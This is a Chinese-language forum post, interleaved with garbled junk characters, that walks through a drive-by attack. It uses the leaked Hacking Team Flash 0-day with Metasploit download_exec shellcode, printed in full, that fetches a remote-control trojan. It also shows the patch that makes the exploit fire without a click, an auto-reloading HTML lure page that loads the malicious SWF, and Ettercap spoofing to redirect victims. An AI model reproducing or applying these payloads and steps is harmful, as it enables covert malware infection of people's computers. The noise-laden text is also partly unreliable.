|
% V5 {. K4 f6 y9 o( ?: X e' c% A
三、flash 0day之手工代码修改制作下载者实例入侵演示
0 H/ ? g3 T" a" T! ~3 m$ f
! V5 Y8 `3 W3 a1 M) a
' h+ m9 f( O( V- w 利用到的工具: / {1 I" R( f, Y7 a1 C
$ t, z/ U/ ~' M, j6 [+ M y" m, b$ V1 {5 ]0 G. A* y
Msf : N% P( _' j; i/ r
( u) \! i2 F- m& w- j0 l
; E. T+ z$ Z n Ettercap
+ h+ ]3 F" @+ @5 A / ^6 O& j' M% ^* I
* w/ }5 r5 J9 r, ~0 [' X Adobe Flash CS6
5 E' B/ _- [4 b+ p3 p
1 V) \3 b9 K/ Z: Q+ [
: W9 v/ a( j) r1 w/ H Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 7 N. \/ Z" m$ q& y( k
! |8 i, _0 H! q/ s: t
$ U" ^9 L( N7 h3 @; R5 ` 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options ( |" h* g5 _ t4 @# T$ c7 f3 W
/ o8 ^2 c/ D/ a1 D. X- a+ N+ q0 I3 j2 K2 {( u, S: ~* g8 `
如图: 7 A6 b C' B/ i; Y7 V0 b( E
9 K0 i3 r& w t( z
$ m6 n/ n9 ~7 ]% P
/ h2 ~" m q$ C) q9 _7 _
+ o3 _& }$ ? h! |- Y2 z2 s
6 `* {- {, T. U; N2 [: I
; L) l9 }, s6 h S9 T4 t' W* m : p8 D# t* S1 D7 f% I: Y- s2 n
# J: }; {; l8 i6 w
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 2 O. H/ Z" `" Y: X
. z1 @ F$ _ O% v6 |1 Y9 Z+ Q! }% y
$ x' Z5 \- W7 N! z4 V " w4 e( X. x/ H/ ]: s
1 S( U( d0 E5 s" ?2 p
& x- |' Z# K" d# S, d7 R: l1 h2 {: m
3 N$ g7 h2 `% B 1 f v/ e) O3 h" W0 {1 H. z0 O
4 g: l& Q/ Y: S2 s% D M8 Z) x& ?. v& S" Z 然后执行generate -t dword生成shellcode,如下: 8 J6 d, H1 [' J0 |5 I0 q+ B
- ]$ i& i% m1 N, K8 [
: F6 n" B; O5 x1 k6 T S 6 I( |8 E7 L0 Q
9 a0 w& p4 n7 Z& W" c# ^1 b9 I" c
5 c. {/ f* l7 i9 [ 复制代码到文本下便于我们一会编辑flash exp,如下:
- j+ k+ R5 ~& c& E0 m# ]3 M! ^$ `7 ?- {
, a1 @3 U8 o4 m( V6 K3 i# s
" _1 i- p, G$ M/ @ 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 9 U7 m+ y, t2 M! K: {" ~' ?
' X9 n s$ f" M
* r) {) Z: {3 ~+ i$ _ 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
' p$ h7 y6 \: F9 }8 F
" K/ @6 b- v' w( o: v5 S7 j" m
* i; C3 `2 q6 Y0 k& Z7 Z7 ` 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
$ {$ {: D7 p; l# } 7 y$ g5 u: ?/ y. x/ e
l/ E0 _" h6 w* }3 S 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 3 e0 T* M2 f/ T% [& K4 I
9 v. B! M2 J4 z
* L. M3 f8 M7 M9 G8 T- l 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, " k* J9 _6 l: A6 z, W! q5 C
) S3 Y2 T2 j _7 \, r# T, `! Q/ o+ L+ Q& Z6 a
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 4 N) Q$ Y* [) A! X, x
! K* U3 Y+ R5 n. V; Q4 r3 `
' W& ] L% J+ m+ P 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 0 N4 k A5 U7 e y
, e8 q) B2 x( P1 x5 R* _! w# P: ]
: P! w( w" d. v9 r/ s 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, $ T% A- i" C6 t5 X
+ j' R/ e" K- }3 w
% V: S( A# ?, e0 D
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
" `# ~. T: X+ I+ W4 W5 O1 ]
R2 z0 q( g4 }8 Q. `* I7 ^
% R' P4 ^1 Z( J0 ^! j 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 7 v( x5 N; ~% d1 H% A
5 d; s6 ~( A2 k9 u
6 t* ?" Z7 \$ T/ I6 q, N 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, ( a+ A8 t, j" V" t4 a8 T: y
5 H; F5 ]0 S( ~! C5 H2 M1 `
$ D* ?; d3 v5 D 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
+ s. L. ~1 f8 [; X 1 w& r3 u1 W0 Z1 Y
9 ~9 y d. @/ Y2 U+ [" n& [
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
4 ]$ D* ~! K; [3 Y
1 ?0 Q5 u# n& {9 R% a* B" [7 V
- P# t- e9 O& K) K 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 8 C2 o# L8 I! T& s! F+ T6 D6 s( P
& S$ {; Z# i+ v, r0 Q/ R
: `" H2 m9 |$ X2 d 4 c: `7 h! I8 D
$ y1 H6 t$ r& z2 f! |: f6 k4 _) ^ I2 H; F
: i) C+ d1 t* K- ^1 S! ~7 J4 s 5 i. k& X; d. P1 y( l* z
) m) g2 q- \& L+ T
下面我们来修改flash 0day exp,需要修改三个文件,分别为: / H+ F! [; _ G! o* B) Y
3 v" b; S5 B. V: ]+ r+ K. U/ N; I! r
. y: {5 Y$ C8 R4 C 5 Y# K) O6 ?- {9 L, D5 U8 s
+ }0 \. ~2 {& e& [2 R1 K8 v
' s% v$ T1 S2 [: U% S
先修改ShellWin32.as,部分源代码如图:
) G1 D5 e$ [- n8 D
* I3 Y6 L( Z; H
6 }' A# U' p( U8 i8 x 1 ]7 w8 D4 `( P! u" G j L
$ g5 o- r e% n# X0 |$ ]$ A; p K2 V6 E3 ~* M. y- Z
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
9 n1 v% u! N( L( \ ^2 p/ f7 Y) X, I! }
; z/ V: p6 L5 l4 z9 Z 5 P* b9 e3 C$ {! [
5 R1 m& b: V* M' l. a( Z4 R
$ X7 k) |0 P0 ~1 {* {& L
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
7 T6 E$ ]- E& M+ {2 R. R7 [
# O. J! h% C; ?8 n0 e( O' d- u) w' X) b) E/ D8 M
0 Q8 Y$ S& |9 ]' q9 W( F. ~6 w
: u+ C! G- k: ^# x( W) m. ~" ?7 F
$ c r8 Y3 V; D/ e, c+ ^7 l: Y3 e
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
: h, z- c9 o& X2 y 1 R: J8 n8 ]& I3 }- Y
; I$ x3 x7 M; D. d# a) y* T6 S 0 W. |, n; }7 N, L, J7 u
: N+ T, c: k" R* m8 Q$ H$ F
Q& A) t' I7 r% Y R' g * S: d8 W! M3 u3 {: q
' a$ a+ ^# ^6 M4 k' j
& |7 h6 N; Y& o# {4 r
" l6 r6 `7 ]$ {$ s
A+ g* X9 H F% q b6 e d
( R6 i7 L" M- R 然后点保存,下面我们来编译一下,打开
' I- J' o5 ]( _: w& z 3 G, `/ @7 k( z6 s/ o" [9 Y
0 P9 G) i+ R* c
exp1.fla然后点文件-发布,看看编译没错误
6 }/ q& R+ f, M ! \' P! n6 c/ P
/ z& e" u; z7 N0 }8 o
- |* y5 l& F3 T4 _/ @2 s 9 q1 Z% P, ~+ a6 B
/ A) L( z2 ?5 o$ w. o( ^2 _ & b, P# r# p' l' T" k
n* W0 ~0 L7 |/ `! w; f- h ?
1 D' Y) ~& f) |/ D* i4 k5 r
5 r/ L p: S/ i X- Q/ c
( h8 u0 v+ a4 g/ Y& C
5 R2 P6 @3 ]& s# K( m9 h; C / @% H/ w- o, r7 y P. \0 n
& ^% q; J+ v5 `
# X1 |2 \9 i& P" W+ }
然后我们把生成的
; Y+ j! e* Y; w8 Y8 P" a4 j% _ - w1 X8 u$ @# m2 h3 ]3 U1 a0 f C; x( B
2 S( w ~! c/ S1 e; ` exp1.swf丢到kailinux 的/var/www/html下:
/ Z$ g8 q4 k% S1 B
6 @3 v/ v/ ~* G; U. C$ n, ~7 Y8 q, i/ f! a W' P: I" e
然后把这段代码好好编辑一下 2 y. [0 @6 H5 o! z# g2 e4 f8 {
) ^% E' l4 b1 Z* L$ W
6 \$ x5 I" _% d2 j' w4 B6 y% U
+ L- d' w) U! {/ k% V) C
/ k( G4 L: w' B7 c L) ?( S$ ]$ y/ `% H
7 q! Y6 W* `3 K( y+ I- W
: {" R+ l& P% K; u; X- S& _* O
- X5 ]5 D1 J1 H6 ~ ! l: G4 W/ T9 @0 X( r2 T3 h
$ [$ y+ M# L1 C1 \" r" }4 _( }: E$ v/ X' h; o+ `
. `( y0 |: E3 q) K o
5 q% _$ T* b% y- X
/ _! L( _+ a7 v S3 Y- V" Q3 l
& b* [+ H' U2 f
: O; o: i) W- Z. l3 K1 e
' E8 Q4 B+ Q7 o$ b# l4 ]
. b" b# T7 }/ _( b2 P$ _ ) m. _9 f+ X. F, v9 |
$ t& i9 q ^; I C2 J2 o
<!DOCTYPE html> : R5 l% U# L' K! D0 Y
5 @6 p$ I2 R4 m" Z8 B5 C0 [
$ K: x+ K- j( u0 u% W* {0 C# { <html> 1 u) ]* p; A T# q6 @9 ?
1 ~$ T, I4 F7 I* _, c* L n! M
4 @, e1 L* A6 `8 a( r5 A' r <head>
4 I9 d @) h1 t4 c/ L5 E) L 1 u, A) M2 @. f) W' Q u: o+ r3 `8 x
7 c7 ~7 c6 n2 i2 y( `6 B <meta http-equiv="Content-Type" content="text/html; & y; w3 j: r* J$ y5 X/ G# `: G4 K
* A- `2 i2 t1 s
8 H& Q, d) n7 |* Y; D. A( R
charset=utf-8"/> 1 b" f% U8 X8 c
8 \; f& t1 h/ W0 M
: o6 p% r/ n3 B: M6 ? </head>
0 L( U- d2 [0 M. e7 I % }, K, x, n% L& S3 v* D: L
: t. Y! r/ y' u, N <body> ( V8 ]/ K6 A @) g
1 z# [, A. q, z8 E* u+ g5 t& o% [2 _) [5 m! o9 ~5 B' a2 Y; e% j
<h2> Please wait, the requested page is loading...</h2>
( P2 Z9 P3 S( s+ p+ C / B$ I& U' ~2 z3 _$ i, i
6 O0 V$ r- I0 B1 x& z5 t6 a <br>
R1 \* I( j! v( j: H/ l7 n/ `
3 c8 v: W# ~) h L0 E0 u+ H) O. D$ n9 d/ A1 U( X- G
<OBJECT # |, ^# H& v1 Z6 D9 {3 n6 D
" E1 m$ s. J- t0 U* o( K6 F7 K
( w5 f+ f# L8 k% P/ g classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie . l0 J# ^5 W: e3 O
$ d" @9 E. N6 U$ s+ j, G) J' u, r1 w
VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ( m' Y" a' J4 d8 b
9 V; T* t# u9 [* l' P" i6 m. b
: ]1 d, I9 N1 G6 X </body> 4 y: p# J2 I0 b3 z: z6 m
/ I3 ^/ `5 f, p
* w6 f2 M5 j1 ]# e2 [3 u <script>
; X5 T7 O; i4 y7 P+ Q& ] % ]( \: ~2 L- b) g( r# `, Y
% l: E: J) k' g A" p1 j setTimeout(function () { 4 R2 a# \+ _6 `& t& @6 v5 Z
# s( j. Q) k" S7 f- j: M5 {- p6 h
$ d! l+ E2 V9 P6 l; ~ - l# F8 ~5 W4 Z
& u. ?. E5 y; ^
& c6 H/ G. W: P ?; u3 _( ^ window.location.reload();
7 T" z3 r) M6 Q+ S& }4 g9 @. z( X 3 v9 E3 v4 M& u7 r- R, }3 V/ `" F
$ M- M- H2 i' ^1 M& u }, 10000); . w5 H7 k3 e( ~- U q) s. c
+ ^% G( h7 {- [( i2 x0 S: o3 D+ p! f; c% t9 V8 h2 F- W) G9 P3 B
4 b3 B2 i4 _+ O- j0 ?$ t
" p) Z: j( L; Q# g
j- X4 h% f0 a </script> & z* c G7 }5 R$ P. M
2 a5 W$ @7 ~' _$ W3 c) a: L2 h# i6 q% Q) Q6 ?7 X
</html>
3 c, Y0 z* q6 q% a& R3 V |- z1 O9 h3 D4 z
5 Y- j, ~% H) O, L) j - J) E" S! p4 F; F
6 R: _5 H7 A+ I* R! ]# [
! q7 K8 P" \# A5 h, q" Q) f# {# } 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ) h N) [: p0 @7 `0 \8 ?$ d
* Z3 B- z) x* i; S5 c% ` Y
$ L0 C$ M. b9 H / c4 n- N3 C3 N \! `
; M) `. O# k5 |8 G0 `' g% l
; U8 X) l* s1 i0 U3 B# Y$ ~ 2 o& ~; i6 a( F1 T6 t" s3 G9 `) w
: N5 `" }: J& {$ {4 ?
$ p) K$ F& E# T 0 z2 W" N, o: K5 q) r3 d- K
* A$ E; C; K2 A% P- r/ b
$ a; @: U! B( K" U, Y D6 u! A* w 4 f1 J( B9 h7 |8 d( q7 _' `
. n. L& O. H9 C% R: \* g
; K; N4 S0 Z Q# j
, f# ]1 W/ c! N0 f1 d
& F, a! K! |6 x# k+ L' {
9 i, I+ r5 a Y. z/ q 下面我们用ettercap欺骗如图: % |- |' [( X7 x" ~5 }9 E" T- g
( Z) r( I1 R( |* b W% ?; z$ |0 R6 W" D) j( b' M. V0 W e; \
$ ?- I% k5 Y$ C* E % j& ~7 R; Y' y" y. q
A; o# |* J5 j/ s+ {: q6 q; P
2 \/ E# N# K) W3 `4 H2 y h) X3 @ 0 A+ N1 ~8 W2 ]. x9 Z$ `! o
8 a% _3 k. G( ?
下面我们随便访问个网站看看:
% N( F- m- q* ?- Q" r 2 }" r$ ]- Y ~
0 Y6 b' |' J( I; i3 z" S
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: " R" E1 a, O% S6 a9 ?; @
+ Y- L/ H% @1 S1 U5 Q
, {" Y; C7 }* S- V & ^/ W+ E- C' N' R' g7 t& X
7 x- m7 F5 ~& s" j( v7 } H l% `! w8 v; ^* `1 V
我们看另一台,
+ @9 {6 C% T+ X7 ~% m, t- f9 U
) P/ J2 i6 F& A; Y" v* x. K1 r* _( L7 X7 `# N1 D
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
3 M. V/ r8 i- t0 L |